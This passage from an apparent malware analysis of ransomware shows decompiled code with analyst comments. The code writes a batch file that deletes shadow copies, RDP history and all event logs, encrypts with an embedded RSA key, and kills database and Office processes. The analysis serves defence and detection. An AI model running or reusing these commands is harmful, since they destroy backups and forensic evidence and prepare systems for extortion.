  lstrcatW(&TempFileName, L”.bat”);
  result = CreateFileW(&TempFileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);   // GENERIC_WRITE, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
  v1 = result;
  if ( result != (HANDLE)-1 )   // INVALID_HANDLE_VALUE
  {
    // Length of the same literal that WriteFile receives below.
    v2 = lstrlenA(“@echo off\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\nreg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\ncd %userprofile%\\documents\\\r\nattrib Default.rdp -s -h\r\ndel Default.rdp \r\nfor /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””);
    WriteFile(
      v1,
      “@echo off\r\n”
      “vssadmin.exe Delete Shadows /All /Quiet\r\n”
      “reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\n”
      “reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\n”
      “reg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\n”
      “cd %userprofile%\\documents\\\r\n”
      “attrib Default.rdp -s -h\r\n”
      “del Default.rdp \r\n”
      “for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””,
      v2,
      &NumberOfBytesWritten,
      0);
    CloseHandle(v1);
    result = (HANDLE)sub_4126D7(&TempFileName);
(c) RSA public encryption key function value:
 // Hex-Rays fragment. The first argument is a hex string embedded in the binary —
 // presumably the operator's RSA public-key modulus (the public exponent "010001",
 // i.e. 65537, is loaded separately in the fragment that follows). v15 is
 // presumably the buffer being encrypted and 0xC0 (192) its length in bytes;
 // the function name is an analyst-assigned label, not a recovered symbol.
 v18 = RSA_Encrypt_Function(
          “A57EEE174A1DBCC23CD0CC6045AF9E1CF07706D30588C86941DEC3DA5AA5483BBC85988DA7B18B5C18DA8BF09CC8AF7FD46E7DD57F729A”
          “3D122387BCFE8B86F7A1D051895CD8ABE50F52913C62729979155C7CEF78B114921691FD7F1E1B206B5F98700A053CF04DBE1C44A2D843”
          “EF0C85468F61ABCF5559FE56F124C383B538F4F16ADB61C42AB3B6BFBDDAB4ADC9CB9DFA615A6506CFCAA752C78B270C568B786FF9D50C”
          “A30E21C5431F83E4A2A7695C24BA262233F28D4253CB01C64410C246291DCE84147EB593730A90F013423DE1DFEA1823CCD07B82C36F6E”
          “EF0F6916219D036D395C4CEEC4FDF20CD997ABB3B8B1F2B6D4BBB5065E31516D7386BD23”,
          v15,
          0xC0u);

….
  // Hex-Rays fragment (start of the function and its closing braces not shown).
  // Zeroes two local buffers, initialises a context and an RNG (sub_4108D0,
  // sub_40FBC8, sub_40FDEC — names not recovered), seeds the RNG with the
  // personalization string "rsa_encrypt" (sub_40FB4F), then loads the modulus
  // from v3 (lpString, the hex string passed in) and the exponent "010001"
  // (= 65537) into big-number structures (sub_40F391). v13 is the modulus
  // length in bytes ((bits + 7) >> 3). The input a2[0..a3) is copied into v8
  // and passed to sub_41028B, which writes into v10.
  // NOTE(review): the call sequence closely resembles the mbed TLS rsa_encrypt
  // sample program (CTR-DRBG seeding with "rsa_encrypt", mpi_read_string,
  // rsa_pkcs1_encrypt) — confirm against the library before naming the subs.
  // The lines after `if ( sub_41028B(...) )` are cut in this excerpt, so it
  // cannot be told here whether the memset below is the error or success path.
  v3 = lpString;
  memset(&v8, 0, 0x400u);
  memset(&v10, 0, 0x200u);
  sub_4108D0(&v12, v4);
  sub_40FBC8(&v11);
  sub_40FDEC(&v9);
  v5 = lstrlenA(“rsa_encrypt”);
  if ( !sub_40FB4F((int)&v11, (int)&v9, “rsa_encrypt”, v5) && !sub_40F391(&v14, v3) && !sub_40F391(&v15, “010001”) )
  {
    v13 = (unsigned int)(sub_40F4AA(&v14) + 7) >> 3;
    memmove(&v8, a2, a3);
    if ( sub_41028B(&v11, v6, a3, &v8, (int)&v10) )

      memset(&v10, 0, a3);
(d) Taskkill function terminating the following processes:
  • “sql”
  • “outlook”
  • “ssms”
  • “postgre”
  • “1c”
  • “excel”
  • “word”
 // Hex-Rays fragment (signature and closing brace not shown). Enumerates running
 // processes with Toolhelp32, converts each image name to a char string
 // (sub_4128DF) and transforms it byte by byte (sub_40C31A — presumably a
 // lower-casing step, given the lower-case table it is then matched against),
 // and for any name containing one of the strings in the table
 // off_41B950..unk_41B96C (the seven entries listed above) launches
 // "taskkill /F /T /PID <pid>" with a hidden window. Returns the result of
 // CloseHandle, or INVALID_HANDLE_VALUE if the snapshot could not be taken.
 // Detection angle: a burst of taskkill.exe children with /F /T from a
 // non-administrative parent is itself a strong pre-encryption signal.
 memset(&StartupInfo, 0, 0x44u);
  StartupInfo.cb = 68;                       // sizeof(STARTUPINFOA) on 32-bit
  result = CreateToolhelp32Snapshot(2u, 0);  // TH32CS_SNAPPROCESS
  v2 = result;
  if ( result != (HANDLE)-1 )                // INVALID_HANDLE_VALUE
  {
    pe.dwSize = 556;                         // sizeof(PROCESSENTRY32W) on 32-bit
    Process32FirstW(result, &pe);
    do
    {
      v3 = (LPCSTR *)off_41B950;             // first entry of the target-name table
      while ( 1 )
      {
        v4 = sub_4128DF(pe.szExeFile, 0);
        v5 = lstrlenW(pe.szExeFile);
        // NOTE(review): v8 is read but never assigned in this excerpt; the loop
        // step and store index look like decompiler artefacts — read the loop
        // as "transform every character of v4 in place".
        for ( i = 0; i < v5; i = v8 + 1 )
        {
          v7 = sub_40C31A((char *)v4[i]);
          v4[v8] = v7;
        }
        if ( StrStrA(v4, *v3) )              // substring match, so e.g. "sql" also hits "sqlservr"
          break;
        ++v3;
        if ( (signed int)v3 >= (signed int)&unk_41B96C )   // end of table reached: no match
          goto LABEL_10;
      }
      // A new heap is created per match and never destroyed (leak in the sample).
      v9 = HeapCreate(0, 0x1000u, 0);
      v10 = (CHAR *)HeapAlloc(v9, 0, 0x100u);
      wsprintfA(v10, “%d”, pe.th32ProcessID);
      lstrcpyA(&String1, “taskkill /F /T /PID “);
      lstrcatA(&String1, v10);
      CreateProcessA(0, &String1, 0, 0, 0, 0x8000000u, 0, 0, &StartupInfo, &ProcessInformation);   // 0x8000000 = CREATE_NO_WINDOW
LABEL_10:
      ;
    }
    while ( Process32NextW(v2, &pe) );
    result = (HANDLE)CloseHandle(v2);
  }
  return result;
(e) Targeted exclusion extensions and README extortion message in Olly: